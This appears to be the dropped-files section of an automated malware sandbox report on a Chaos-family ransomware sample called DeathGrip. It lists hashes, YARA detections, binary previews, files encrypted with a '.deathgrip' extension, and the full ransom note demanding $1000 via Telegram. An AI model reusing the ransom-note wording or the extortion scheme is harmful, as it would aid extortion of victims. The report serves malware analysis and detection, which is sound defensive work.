                                                          SHA-512:A033CE87C2E503B386FB92AA79A7EC14D6C96E4A35D0CB76D4989BACD16F44C4ED5AC4E13057F05F9D199A3FD8545B9A25296515EC456F29C464D949FF34942A
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.C...C...C...J.O.......A.......N.......K.......G.......@...C......Y...B...Y...B...Y...B...Y...B...RichC...........................PE..d....l.d.........." ...$.............................................................D....`.........................................px...".............................../...........*..T............................(..@...............8............................text............................... ..`.rdata..............................@..@.data...PG.......>..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\ucrtbase.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1018792
                                                          Entropy (8bit):6.641182647518247
                                                          Encrypted:false
                                                          SSDEEP:24576:hLyubutYBWSlhrANUDk8ExrmxvSZX0ypFiR+c:VyubJvlhrVETiR+c
                                                          MD5:8E7680A8D07C3C4159241D31CAAF369C
                                                          SHA1:62FE2D4AE788EE3D19E041D81696555A6262F575
                                                          SHA-256:36CC22D92A60E57DEE394F56A9D1ED1655EE9DB89D2244A959005116A4184D80
                                                          SHA-512:9509F5B07588A08A490F4C3CB859BBFE670052C1C83F92B9C3356AFA664CB500364E09F9DAFAC7D387332CC52D9BB7BB84CEB1493F72D4D17EF08B9EE3CB4174
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.Pc*.>0*.>0*.>0#..0..>0*.?0..>0O..0+.>0O.>1+.>0O.=1..>0O.;1p.>0O.01..>0O.:1d.>0O..0+.>0O.<1+.>0Rich*.>0........................PE..d....A.0.........." .........b.......6..............................................y.....`A........................................ ...........................H....d...'......p....y..T............................B...............o...............................text............................... ..`.rdata...w...0...x..................@..@.data....$..........................@....pdata..H...........................@..@.rsrc................R..............@..@.reloc..p............X..............@..B................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\unicodedata.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1141016
                                                          Entropy (8bit):5.435066249596469
                                                          Encrypted:false
                                                          SSDEEP:12288:P3EYbfjwR6nbsonRiPDjRrO5184EPYPx++ZiLKGZ5KXyVH4eD1JD:PUYbMB0IDJcjEwPgPOG6Xyd461JD
                                                          MD5:1905B5D0F945499441E8CD58EB123D86
                                                          SHA1:117E584E6FCC0E8CFC8E24E3AF527999F14BAC30
                                                          SHA-256:B1788B81FA160E5120451F9252C7745CDDE98B8CE59BF273A3DD867BB034C532
                                                          SHA-512:ED88CD7E3259239A0C8D42D95FA2447FC454A944C849FA97449AD88871236FEFDAFE21DBFA6E9B5D8A54DDF1D5281EC34D314CB93D47CE7B13912A69D284F522
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D|............eG.....c.....c.....c.....c.....b....Ke.......Q...b.....b.....b+.....b....Rich...........................PE..d....k.d.........." ...$.@..........P*..............................................J.....`.............................................X............`.......P..0....:.../...p.......]..T............................[..@............P..x............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data...H....0......................@....pdata..0....P.......&..............@..@.rsrc........`......................@..@.reloc.......p.......8..............@..B................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\wheel-0.42.0.dist-info\INSTALLER

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):4
                                                          Entropy (8bit):1.5
                                                          Encrypted:false
                                                          SSDEEP:3:Mn:M
                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                          Malicious:false
                                                          Preview:pip.

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\wheel-0.42.0.dist-info\LICENSE.txt

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\wheel-0.42.0.dist-info\METADATA

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:Unicode text, UTF-8 text
                                                          Category:dropped
                                                          Size (bytes):2203
                                                          Entropy (8bit):5.084146850941847
                                                          Encrypted:false
                                                          SSDEEP:48:DEYpFX5MPktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEYp/MPktjayq/7kOfsUzmbYy
                                                          MD5:D9BE712506F59B77F1B439378F1F17C9
                                                          SHA1:22B5EEDF6DA5662DB4453E1E3C0A208EAE78E005
                                                          SHA-256:40C658BCF17CF05DA506767D71FEFEBA0AA69060D437C8F7154BCD1E290B85C9
                                                          SHA-512:5952359E64F955C75A6881E7D7C24D25CF79BB0DE206E10964D71BE41692ACB905AA0D6F8E667C8680BDD262292313644AAC1E3B1E4848403A3344B546DD673E
                                                          Malicious:false
                                                          Preview:Metadata-Version: 2.1.Name: wheel.Version: 0.42.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.7.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\wheel-0.42.0.dist-info\RECORD

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):4568
                                                          Entropy (8bit):5.71028247322035
                                                          Encrypted:false
                                                          SSDEEP:96:skXgPDwd1Px0CTQIvw7bjIH/Hu4vp88FmGvuXiJP9GJPh/TZ765qjKGAFI78oVew:skXgm2Moe2Y9Uh/TZ765qjKGAFeDVOLc
                                                          MD5:10548C03B6BCD243DA56AF48A5A96F22
                                                          SHA1:813EAE9354F294A34D85FA44A4E9B8D2619C1C2C
                                                          SHA-256:FD9796C4FF5266DB0E09688E332D1A9264452C8D1D97E0B2BE12EDE1B6ACD9A3
                                                          SHA-512:ABE92948C4F6DF5776B46094035F8527F3D565DC9E99BE102A10E36F0889A4CDFD31377932C2E138A54698E733078388CF308962A53BC2075D8B7CFF684E0D77
                                                          Malicious:false
                                                          Preview:../../Scripts/wheel.exe,sha256=N_djrUS8N_t8i0-4GjJsr5WnhfhurvICz9bS1M4yC_E,108413..wheel-0.42.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.42.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.42.0.dist-info/METADATA,sha256=QMZYvPF88F2lBnZ9cf7-ugqmkGDUN8j3FUvNHikLhck,2203..wheel-0.42.0.dist-info/RECORD,,..wheel-0.42.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.42.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.42.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=c5n4mea4NyUhMCk8GWbX4_O739E5ATPX23lTJRXf9ZI,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-311.pyc,,..wheel/__pycache__/__main__.cpython-311.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-311.pyc,,..wheel/__pycache__/bdist_wheel.cpython-311.pyc,,..whee

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\wheel-0.42.0.dist-info\WHEEL

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):81
                                                          Entropy (8bit):4.672346887071811
                                                          Encrypted:false
                                                          SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                          MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                          SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                          SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                          SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                          Malicious:false
                                                          Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\wheel-0.42.0.dist-info\entry_points.txt

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\win32\win32api.pyd

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):133632
                                                          Entropy (8bit):5.851354810898845
                                                          Encrypted:false
                                                          SSDEEP:3072:HPwB2zC1vwC3XetCf5RlRVFhLaNKPAyymhNYm9b9e:HIB2zkvwGXetCfDlRVlPAyLYm9
                                                          MD5:1D6762B494DC9E60CA95F7238AE1FB14
                                                          SHA1:AA0397D96A0ED41B2F03352049DAFE040D59AD5D
                                                          SHA-256:FAE5323E2119A8F678055F4244177B5806C7B6B171B1945168F685631B913664
                                                          SHA-512:0B561F651161A34C37FF8D115F154C52202F573D049681F8CDD7BBA2E966BB8203780C19BA824B4A693EF12EF1EEEF6AEEEF96EB369E4B6129F1DEB6B26AAA00
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I^.f'..f'..f'......f'...&..f'...#..f'...$..f'.o.&..f'..."..f'...&..f'..f&..g'.o....f'.o.'..f'.o.%..f'.Rich.f'.................PE..d......d.........." .........................................................P............`..........................................................0..\....................@..$....v..T............................<..8............0..........@....................text...$........................... ..`.rdata......0......................@..@.data...x(......."..................@....pdata..............................@..@.rsrc...\....0......................@..@.reloc..$....@......................@..B................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Roaming\svchost.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\main.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1357824
                                                          Entropy (8bit):4.029275266102345
                                                          Encrypted:false
                                                          SSDEEP:12288:75gafkW6xqP9iz8ZW29ohk3qHS/6gOHeA/MBU/7x5qDyNjC9Ha1DKs5y6blZRjHe:7Db/s/MSldTzfY/YRSv225PUXW8iF
                                                          MD5:840EB9E50C131322605C5EA90AE1312F
                                                          SHA1:FC9548F91123E05196DAD6BCAB11D29ABD01500C
                                                          SHA-256:F9600B1B06588E3815A55EB81E35289F7B9A5749AE623550734C5F3D8C04E038
                                                          SHA-512:8E37C5890089BF1997E1C4C777A92F71EAE9A86F11D1FB3CB3671DFA8C15C4365ED1F8811E6AAE4D31F0FE73C1960B142F684A5274F086491F7D238A79313FFE
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_Chaos_1, Description: Yara detected Chaos Ransomware, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                          • Rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM, Description: Detects executables containing many references to VEEAM. Observed in ransomware, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: unknown
                                                          • Rule: MALWARE_Win_Chaos, Description: Detects Chaos ransomware, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......\@..p............................................................(....*..0..........(....,.r...p(....&*(....,'~ ...-....#...s..... ...~ ...s....(....(....,.*(....,..(....~....,.(....~....,.~....(....+.~....,.~....(....~....,.(....~....,<~....,.(....~....,.(....~....,.(....~....,.(....~....,.( ...(....~....,.~....(....(....~....(!...*.s)...(....*..0.._..................r%..p....r;..p..........+.......(....o....o.......(....,.......&.....X.......i2..*.*.......+..J......

                                                          C:\Users\user\Desktop\Mai.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\4wx72yFLka.exe
                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):17965330
                                                          Entropy (8bit):7.9968743048008255
                                                          Encrypted:true
                                                          SSDEEP:393216:jEkvT6o50QjTGtDTNk3meCcGfd9YMvrr5LTuguUiLXD:jD6buG5xaY5F9Yi19Ji3
                                                          MD5:14F564392EEC0B9EDA9530411159057C
                                                          SHA1:AB49B66DFF54E32DF235B11B8D84934C2B455523
                                                          SHA-256:50C043F374E51B8220FC411E24CC2C40C1AA59E1F19EBDC1170883C74C7DDF83
                                                          SHA-512:7D27CA263069F92B4B8BD38545EEE7FB260338AB246DFF94A606BA301F1FB7588A649926B1082B290D2D642CD8E94FC3491AC2ABFF6AAFC5173A9A025DACA65B
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?.........................PE..d....b.f.........."....%.....^.................@.............................p.......x....`.....................................................x....`....... ..."...........`..\...0..................................@............... ............................text............................... ..`.rdata...+.......,..................@..@.data...83..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc........`......................@..@.reloc..\....`......................@..B................................................................................................................................................................................................

                                                          C:\Users\user\Desktop\ZQIXMVQGAH\SQSJKEBWDT.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\Desktop\ZQIXMVQGAH\ZQIXMVQGAH.docx

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\Desktop\ZQIXMVQGAH\ZQIXMVQGAH.docx.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.7586857076207565
                                                          Encrypted:false
                                                          SSDEEP:24:F+Aq1rmkDqze+4zscKHS90CQVMJuip9PpqBKR5p69xlutFyzR2gjSCGg3fl/9xr2:1kDYe+PcKyWnS2BKP+xlu3Q2wUIfl/94
                                                          MD5:98924F48407965D6EA470089930C846F
                                                          SHA1:3D1804224361CA0BE704DB311E7A1F77CDB138D5
                                                          SHA-256:4E43291C6CE1D8D461689D10970B89E5CB481F5D2E6DBAA8BD3F2B612B0118E3
                                                          SHA-512:3F741AC2F7B8AEB630D406DAB25D521167A87A92486A4C80CCBF8CBEDB8A9785D03A1C8AEB6B6B90FD53B3378ACD05D58F34DABEEFD40E9E9D9B1E6BC02F93E0
                                                          Malicious:false
                                                          Preview:............zds]..M,"f.R.W>.... .3Q./..?....x!.h$.G...{.z?}..;6....$.q..........B.`W.'...Ol.........G.q......q...."p.ek.l6..#u$r....?P"b...=...N...!...Us.....{^.M!KWL.xe....6,..w.(..O....-p....<M.r.".4*..s2.3g.Iw.f.\..0....}..N....A.Lq.8rQ.S1#..]]b?R]#....)6.......lL%.i*...st.M......}..N04.GRv.t....Bi.......(=.J..<.].....d...u....VCq...r..r....6ng..k.G[.J.y.G.A.A7..mr)|... _..3;s.~.B.K.^.).Z.f.".5s...+.F.+...(..C..d<...+V.._'4.U.,4G..6.L..\..C...{_D..Q.0...,<..PS....u..*...V46...#..~.o..0.........J.`..6....'..;.-[..*.$....+.>.~...L.;i.....(..R.... .WW.w.A...-..X..k.. ..S.H..!....Q3.[0.5d..h...*an].D.........y.ZG..8.V.........*..^."G.F..L....<.w....s8..(....4..'e.P..da..'.........y..:./....G...s.q.(.MW[}2.2...W....v.......%.d..Mn/.......3K.2V...l.....b............l.RY...Y.........?.D..=.4..F.ig.P.....<.......B...O.........R.).A.O, ..'q^.r.s.B...n..&....{..6..t...h.W.......xJ.....1.r.).hu....)...u.>...`.#.5...MuN.....U.I...\;..;..ds.n.(.

                                                          C:\Users\user\Desktop\main.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\4wx72yFLka.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\Downloads\NVWZAPQSQL.mp3

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\Downloads\PIVFAGEAAV.jpg

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\Downloads\PIVFAGEAAV.jpg.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.72355410638425
                                                          Encrypted:false
                                                          SSDEEP:24:PHkwVD95O9LEbC47XR3luUMbP0m/TAPtXzPgvrw0dPUbC8Xl84vlP:vkm5XbTR3nIPJitjPUJY9xvlP
                                                          MD5:DD073E733B6AE41EDA5F076F238E938E
                                                          SHA1:080610AE99A87C60378FA8741C01CEBC359B6523
                                                          SHA-256:7000D04608DBE4380EDEEB01E0C3F165ED5E889BC49729761CB7EEF3B17BAAD3
                                                          SHA-512:EBA6377D77E86B0FFC12752F873B4F80BF749135B1BF98B80F8D3EECAD1B2E453F1C37DC90762C41E94BD2B6092928C26CEF8DD1314F3B9676F8D6DD8D6D45A8
                                                          Malicious:false
                                                          Preview:..........[:X.....J8.L....O.....Ae..H#..sN.....H}_....[P...O.. ........LJu..+P.U..)....m..Q....y...9V.qZ.'..E...O.]..F.d...`....).AFX.`Z..Ow.}3....NU....|<.....rR...TK..e.......nO......8....f.h....n@]R...b%....D..a.....cx.w.!.DD......7...~.~.A...~.I..ig2.Uk.u;....l6..Z......<.+G..7..z;h..|......W.Q{B.~.P..NX[....4..r..m...v.JUQ.G.\#8....o.3.iq..&....n'*..ea..FF[....C..F..LLK1.....@..B./...X..@..@...r.#..f.d...O.w.7X.r.....\........n.......E.-...h3.jMH5V.E...x...k.J.E......}a.y..R7.... +.&p.{.P/+H..%.$...m...@..-#..M....%.Y..@....e3..}.m..kr..l..4.yN.w.[.q;<...:...K'..i.{q.9O[.(.l...f..v..e..JeG......h..F.......f...Lc.5y..s...4.|.S.Y.~La..e{W.eV.qT1:...:.....J...{....K.G..}..&..dQ.R^.N...X..*.pa..{....Gh}...njN=.h..K:z.0..@....2..`...d..D.Iv.Y.nP..*3^ad..1.Y?yN%#..u.. *..R.R..D......F.4.....O.j.............IYj6......y}$....m.=..#.o[X.Q.rH....g.R.......z.z1\...v.k(|V.......F...%.......q..X.......J..4..=..U*.;.F.t.S.....*3....7N....

                                                          C:\Users\user\Downloads\PWCCAWLGRE.mp3

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\Downloads\PWCCAWLGRE.mp3.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.750470392169932
                                                          Encrypted:false
                                                          SSDEEP:24:Ha+gtdlnfnLO2MnVSRLhkF7k1PGWcisJ0sIDg26EpZrg6qGlJY:R2lnfnLOCchkhGWc6bPrkGnY
                                                          MD5:76D1AA3C3DEADD677770097DFE0CBA65
                                                          SHA1:DAD32079B53BF513A2026ECA737C5B5457C285CE
                                                          SHA-256:67325C96B2C5BE69A3A4B168FDB77FD65235EBA7FA852D3CBA05C7EBA47964E2
                                                          SHA-512:DF4516C5A1305048367DEF768483B93B8E448B27964D7F1DD56817439EF369028C8C72916002054BEFAEF9D14160CB3A5410A8EB216063087B2F54678C694B64
                                                          Malicious:false
                                                          Preview:..........,..+/...uK?.......Z......Z..~.D79!}....kf.."...Pq&..foE..I..-.G...2........Y.S.RQ..ud.X...RNhu......f..cg).}e..h.....Uf..P.P .7..)yB5..P....]8-.>..P...+.TM.X0....;..2.2.c..S.NG..;.}....d (.?K~t.=f..Oo..c.!.....N.}.nQNh.BK.6..g....K.%.Z.3D.b......Np....Uy:^nQcV_....d..t/#..F...*.X.(..|^.l!..}.....F...r)=...0..*.........xX.4.rO...8tf.g...`..y.\.....U|!Q...I."t.#w....g...W.e.i.4.d.pd;.V..z..k...s.C......o..D...S....F.C.9.L..g.V^vw+.....(..Y.~G...@..FHU../."NI..........b..>....a....W...9.)........YHIX($._.v..`...X."9..h...sxw.$.......)(..)6.-.^....;:..8@..2g..1S....I..e..........T..7...N...n.8..=...7...........S>.............m..'~LX....T.....2...uM.O.......Cl...s....o .<}].q._...K...^....i...G..*..X.4....p....|.0......M..!t...g...i.....Ng....@..P.6.........Yc~.....D.....Lk^|....xm...E..(.$...le.e..;.."pk."Lg.On..J.oj..AX_..............,."...>.......C....lQ..l.{.. $.k.*..T..y..!...aCO....4vq>HYN...;z.&W...o.........

                                                          C:\Users\user\Downloads\PWCCAWLGRE.pdf

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
